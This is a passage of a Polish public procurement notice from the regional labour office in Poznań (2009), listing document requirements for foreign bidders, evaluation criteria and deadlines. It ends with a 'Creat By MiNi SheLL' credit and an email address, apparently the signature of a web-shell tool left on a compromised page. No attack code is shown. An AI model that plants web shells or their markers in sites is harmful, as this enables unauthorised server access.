10.4 zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 PZP, (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert); przy czym gdy ofertę składa kilka podmiotów działających wspólnie złożenie kompletu wymienionych wyżej dokumentów dotyczy to każdego z nich. 
11. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów, wykonawca może je zastąpić stosownym dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
12. Dokumenty, o których mowa w rozdziale 6) pkt.13. SIWZ muszą być złożone 
w formie oryginału, odpisu, wypisu, wyciągu lub kopii, przetłumaczonych na język polski i poświadczonych przez wykonawcę za zgodność z oryginałem. 
13. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów (np. jeśli przedstawione kserokopie będą nieczytelne lub będą wzbudzać wątpliwości co do ich prawdziwości)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 40</li>
<li>2 - Sposób realizacji badania - 60</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wup.poznan.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojwódzki Urząd Pracy w Poznaniu
ul. Kościelna 37
60 - 537 Poznań
IIp. pok.33.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2009 godzina 10:00, miejsce: Wojwódzki Urząd Pracy w Poznaniu
ul. Kościelna 37
60 - 537 Poznań
IIp. pok.33.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 21.03.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com